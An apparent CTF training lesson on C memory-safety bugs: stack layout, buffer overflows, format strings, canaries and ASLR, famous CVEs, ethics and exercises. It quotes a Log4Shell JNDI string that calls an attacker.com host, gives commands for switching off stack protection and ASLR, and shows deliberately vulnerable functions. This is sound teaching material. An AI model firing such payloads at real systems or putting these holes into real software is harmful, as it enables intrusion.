student@ubuntu:~$
ctf Lesson 38 35 min read

NCL: Exploit Foundations

Buffer overflows, format strings, and the stack — how vulnerabilities work

Exploit Foundations

C gives you direct access to memory. You can read any byte, write any byte, and jump to any address. That power is what makes C fast, dangerous, and the language behind every operating system kernel on Earth.

The cost: if you write past the end of an array, C will not stop you. There is no ArrayIndexOutOfBoundsException. There is no runtime check. The CPU just writes into whatever memory comes next. If that memory happens to hold the address your function returns to, you have just hijacked the program’s control flow.

This is not a theoretical concern. Buffer overflows have been the root cause of the most catastrophic security vulnerabilities in computing history, from the 1988 Morris Worm to the 2021 sudo exploit that gave any local user root access.

This page teaches you how these vulnerabilities work at the memory level. You will trace through the stack byte by byte. The goal is understanding — when you write C, you will know exactly why gets() is banned and why fgets() exists.

Prerequisites: You should understand pointers (Lesson 3.1), stack memory (Lesson 3.5), and arrays/pointer arithmetic (Lesson 3.7).


1. The Stack — Where Your Functions Live

Every time you call a function, the CPU creates a stack frame — a block of memory on the stack that holds everything that function needs. The stack is a region of memory that grows downward (from high addresses toward low addresses).

Here is what the stack looks like when main() calls vuln():

High addresses (top of memory)
┌────────────────────────────┐
│                            │
│   main()'s stack frame     │
│                            │
├────────────────────────────┤
│   Return address           │  ← Address in main() to jump back to
├────────────────────────────┤
│   Saved RBP                │  ← Bookmark to main()'s frame base
├────────────────────────────┤
│                            │
│   vuln()'s local variables │  ← char buffer[64] lives here
│   (buffer, counters, etc.) │
│                            │
├────────────────────────────┤
│   ...                      │
Low addresses (bottom of memory)

Three facts that make exploits possible:

  1. The stack grows down — new frames are placed at lower addresses
  2. Buffers fill upbuffer[0] is at the lowest address, buffer[63] at the highest
  3. The return address sits above the buffer — writing past the buffer’s end moves toward it

The return address is the single most important value on the stack. When a function finishes (return or hits the closing }), the CPU reads the return address and jumps there. If an attacker overwrites it, the CPU jumps wherever the attacker wants.


2. Buffer Overflow — The Classic Vulnerability

Consider this function:

void vuln(void) {
    char buffer[64];
    gets(buffer);       // reads until newline — NO size limit
}

gets() reads characters from standard input into buffer until it encounters a newline. It has no concept of buffer size. It does not know that buffer is only 64 bytes. It just keeps writing.

Here is what memory looks like on x86-64 when vuln() is running:

Address         Contents              What it is
──────────────  ────────────────────  ──────────────────
0x7ffc...0080   0x00000000004011a0    Return address (8 bytes)
0x7ffc...0078   0x00007ffc....00b0    Saved RBP (8 bytes)
0x7ffc...0074   buffer[60] - [63]     ┐
0x7ffc...0070   buffer[56] - [59]     │
...             ...                   │ buffer (64 bytes)
0x7ffc...003c   buffer[4]  - [7]      │
0x7ffc...0038   buffer[0]  - [3]      ┘

Now trace what happens with different input lengths:

64 charactersbuffer is exactly full. buffer[0] through buffer[63] are written. No overflow. Program works normally.

72 characters — Characters 0-63 fill buffer. Characters 64-71 overwrite the Saved RBP. The calling function’s frame pointer is corrupted. The program will likely crash when the caller tries to access its local variables.

80 characters — Characters 0-63 fill buffer. Characters 64-71 overwrite Saved RBP. Characters 72-79 overwrite the return address. When vuln() returns, the CPU jumps to whatever 8-byte address the attacker placed at positions 72-79.

The math: buffer (64 bytes) + Saved RBP (8 bytes) = 72 bytes to reach the return address on x86-64.

Why gets() is banned

The gets() function was removed from the C standard in C11. It is the only standard library function that was deleted from the language — because it is impossible to use safely. There is no way to tell gets() the size of the buffer.

$ gcc -o vuln vuln.c
/tmp/ccXYZ.o: in function 'vuln':
vuln.c:(.text+0x1a): warning: the 'gets' function is dangerous and should not be used.

GCC will still compile it (with a warning), because old code exists. But the warning is serious.


3. Dangerous C Functions and Their Safe Alternatives

Buffer overflows are not limited to gets(). Several standard library functions write to buffers without checking size:

Dangerous Safe Alternative The Problem
gets(buf) fgets(buf, size, stdin) No size parameter at all
strcpy(dst, src) strncpy(dst, src, size) Copies until null terminator — no bounds check
strcat(dst, src) strncat(dst, src, size) Appends until null terminator — no bounds check
sprintf(buf, fmt, ...) snprintf(buf, size, fmt, ...) Formats into buffer with no size limit
scanf("%s", buf) scanf("%63s", buf) or fgets() Reads until whitespace — no bounds check

The pattern: the dangerous version has no way to specify how many bytes to write. The safe version takes a size parameter.

// DANGEROUS — if line is longer than 64 chars, buffer overflow
char buffer[64];
gets(buffer);

// SAFE — reads at most 63 chars + null terminator
char buffer[64];
fgets(buffer, sizeof(buffer), stdin);
// DANGEROUS — if src is longer than dst, buffer overflow
char dst[32];
strcpy(dst, src);

// SAFE — copies at most 31 chars + null terminator
char dst[32];
strncpy(dst, src, sizeof(dst) - 1);
dst[sizeof(dst) - 1] = '\0';  // strncpy doesn't guarantee null termination
Checkpoint: A program uses sprintf(buffer, "Hello, %s!", username) where buffer is 128 bytes. Is this safe?

Only if username is guaranteed to be shorter than 119 bytes (128 - 8 for “Hello, “ - 1 for “!”). If username comes from user input with no length check, this is a buffer overflow. The fix: snprintf(buffer, sizeof(buffer), "Hello, %s!", username). snprintf will truncate the output to fit within the buffer size.


4. Format String Vulnerabilities

printf is one of the most powerful functions in C. It is also one of the most dangerous when used incorrectly.

The correct way to print user input:

printf("%s", user_input);   // user_input is treated as DATA

The dangerous way:

printf(user_input);          // user_input is treated as a FORMAT STRING

When you write printf(user_input), the printf function scans user_input for format specifiers (%x, %s, %d, %n). If the user types Hello, printf prints “Hello” — no problem. But if the user types %x %x %x %x, something very different happens.

What happens with %x

printf expects each %x to have a corresponding argument on the stack. But you did not pass any arguments — just the format string. So printf reads the next values from the stack anyway, treating whatever happens to be there as the arguments:

User types:  %x %x %x %x
printf sees: four %x specifiers, no arguments provided

printf reads 4 values from the stack:
  %x  →  0x7ffc8234   (some stack value)
  %x  →  0x00000040   (some stack value)
  %x  →  0xdeadbeef   (some stack value)
  %x  →  0x00401149   (some stack value — maybe a return address)

Output: 7ffc8234 40 deadbeef 401149

The attacker is reading memory they should not have access to. This leaks stack values, which can include:

  • Return addresses (reveals where code is loaded in memory)
  • Pointers to heap data
  • Local variables from other functions
  • Canary values (see Section 5)

The %n specifier — writing to memory

%n does not print anything. Instead, it writes the number of bytes printed so far into the address pointed to by the corresponding argument. Combined with careful format string construction, an attacker can write arbitrary values to arbitrary memory addresses.

This is why printf(user_input) is a critical vulnerability. It turns a print statement into a read/write primitive for the entire process memory.

The fix is trivial:

printf("%s", user_input);   // user_input can never be interpreted as format specifiers
Checkpoint: A program does fprintf(logfile, user_message) to log user actions. Is this vulnerable?

Yes. fprintf has the same format string behavior as printf. If user_message contains %x or %n, they will be interpreted as format specifiers. The fix: fprintf(logfile, "%s", user_message). This vulnerability is common in logging code because developers think “it is just writing to a file, what could go wrong?”


5. Protection Mechanisms

Modern operating systems and compilers deploy multiple defenses against exploitation. Understanding these matters because CTF challenges often disable specific protections to make the challenge solvable.

Protection What It Does How to Check
Stack canary Places a random value between the buffer and the return address. Before the function returns, it checks whether the canary was modified. If so, the program aborts. checksec binary
ASLR Randomizes where the stack, heap, and libraries are loaded in memory. Each run uses different addresses, so hardcoded exploit addresses fail. cat /proc/sys/kernel/randomize_va_space (0 = off, 2 = full)
NX / DEP Marks the stack as non-executable. Even if an attacker injects machine code onto the stack, the CPU refuses to execute it. checksec binary
PIE Position-Independent Executable. The binary itself loads at a random address (not just the stack and libraries). checksec binary
RELRO Makes the Global Offset Table (GOT) read-only after the program starts. Prevents attackers from overwriting GOT entries to redirect function calls. checksec binary

Stack canaries in detail

Without canary:                    With canary:
┌──────────────┐                   ┌──────────────┐
│ Return addr  │                   │ Return addr  │
├──────────────┤                   ├──────────────┤
│ Saved RBP    │                   │ Saved RBP    │
├──────────────┤                   ├──────────────┤
│              │                   │ CANARY VALUE │ ← random, checked before return
│ buffer[64]   │                   ├──────────────┤
│              │                   │              │
└──────────────┘                   │ buffer[64]   │
                                   │              │
                                   └──────────────┘

An overflow that corrupts the return address must also corrupt the canary (because the canary sits between them). The program detects this and calls __stack_chk_fail, which prints *** stack smashing detected *** and terminates.

To compile without canary protection (for CTF practice):

gcc -fno-stack-protector -o vuln vuln.c

To disable ASLR temporarily (for CTF practice):

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

checksec shows all protections at a glance:

$ checksec --file=vuln
RELRO           STACK CANARY      NX            PIE
Partial RELRO   No canary found   NX enabled    No PIE

6. Notable CVEs — Real Vulnerabilities That Changed the Internet

These are real vulnerabilities that used the techniques described in this lesson. Each one affected millions of systems.

CVE-2014-0160 — Heartbleed

A buffer over-read in OpenSSL’s heartbeat extension. The server trusted a length field sent by the client without checking it against the actual data size. The client could claim “I sent 64KB of data” when it only sent 1 byte, and the server would respond with 64KB of its own memory — including private keys, session cookies, and passwords. Affected roughly 17% of all HTTPS servers at disclosure.

CVE-2014-6271 — Shellshock

An environment variable injection in Bash. Bash stored function definitions in environment variables, but its parser continued executing commands after the function definition ended. An attacker could append arbitrary commands after a function definition, and Bash would execute them. Exploitable via CGI web servers, DHCP clients, and any service that passed user input through environment variables.

CVE-2021-3156 — Baron Samedit

A heap-based buffer overflow in sudo, present for nearly 10 years (since 2011). By passing a carefully crafted command line to sudoedit, any local user could overflow a heap buffer and gain root privileges. The exploit worked on every default Linux distribution.

CVE-2016-5195 — Dirty COW

A race condition in the Linux kernel’s copy-on-write (COW) memory management. Two threads racing between a memory write and a page fault could trick the kernel into writing to a read-only memory mapping. This allowed any local user to modify files they could only read — including /etc/passwd — and gain root.

CVE-2021-44228 — Log4Shell

A remote code execution vulnerability in Java’s Log4j logging library. Log4j interpreted ${jndi:ldap://attacker.com/exploit} in log messages as an instruction to download and execute code from a remote server. Any application that logged user-controlled input with Log4j was vulnerable. Affected hundreds of millions of devices.

CVE-2024-3094 — XZ Backdoor

A supply chain attack on the xz compression library. A maintainer with commit access inserted a backdoor into the build system (not the source code — the build scripts) that modified the compiled binary to intercept SSH authentication. The backdoor was discovered by accident when a developer noticed sshd was 500ms slower than expected. This attack bypassed all source code review.

Checkpoint: Which of the CVEs above is a buffer overflow? Which are not memory-safety bugs at all?

Buffer overflow / over-read: Heartbleed (buffer over-read), Baron Samedit (heap buffer overflow).

Not memory-safety bugs: Shellshock (parser logic error), Dirty COW (race condition in kernel), Log4Shell (injection in Java — a memory-safe language), XZ Backdoor (supply chain — malicious build scripts). Memory safety does not protect against every class of vulnerability.


7. The Ethical Line

Everything on this page describes how vulnerabilities work. Understanding the mechanism is essential for:

  • Defense — You cannot write secure code if you do not understand how insecure code is exploited. Every dangerous function in Section 3 has a safe alternative. You now know why the alternative exists.
  • Competition — CTF and NCL challenges are legal, sandboxed environments designed for practicing these skills.
  • Research — Security researchers find and report vulnerabilities through responsible disclosure, giving vendors time to patch before publishing details.

Unauthorized exploitation of computer systems is a federal crime under the Computer Fraud and Abuse Act (18 U.S.C. 1030). This applies regardless of whether you cause damage. Accessing a system you are not authorized to access is the crime itself. “I was just testing” is not a defense.

The knowledge on this page makes you a better programmer and a better defender. Use it that way.


8. Practice Exercises

All exercises involve analysis and understanding. None require exploiting a running system.

Exercise 1 — Stack frame diagram. Draw the stack frame for this function on x86-64. Label the buffer, saved RBP, and return address. Calculate how many bytes of input overflow the return address.

void target(void) {
    char name[32];
    int count = 0;
    gets(name);
}

Hint: int count occupies 4 bytes. Consider padding — the compiler may align variables to 8-byte boundaries.

Exercise 2 — Spot the vulnerability. Identify the vulnerability class (buffer overflow, format string, or both) in each function:

void func_a(char *input) {
    char buf[100];
    strcpy(buf, input);
}

void func_b(char *input) {
    printf(input);
}

void func_c(char *input) {
    char buf[256];
    snprintf(buf, sizeof(buf), "%s", input);
}

void func_d(char *input) {
    char buf[64];
    sprintf(buf, "User said: %s", input);
}

Exercise 3 — checksec analysis. Compile the same program four different ways and run checksec on each. Record which protections are enabled or disabled:

gcc -o v1 program.c                                         # Default
gcc -fno-stack-protector -o v2 program.c                    # No canary
gcc -fno-stack-protector -z execstack -o v3 program.c       # No canary, executable stack
gcc -fno-stack-protector -z execstack -no-pie -o v4 program.c  # No canary, NX off, no PIE

Exercise 4 — CVE research. Pick one CVE from Section 6. Find the original advisory and a technical writeup. Write a one-paragraph summary explaining: what the vulnerability was, how it was triggered, what the impact was, and how it was fixed. Use your own words.


Resources

Practice: picoCTF (search “buffer overflow”) · pwnable.kr · OverTheWire Narnia (binary exploitation wargame)

Reference: CWE-120: Buffer Copy without Checking Size of Input · CWE-134: Use of Externally-Controlled Format String · checksec.sh

Video: LiveOverflow — Binary Exploitation from scratch · Computerphile — Buffer Overflow Attack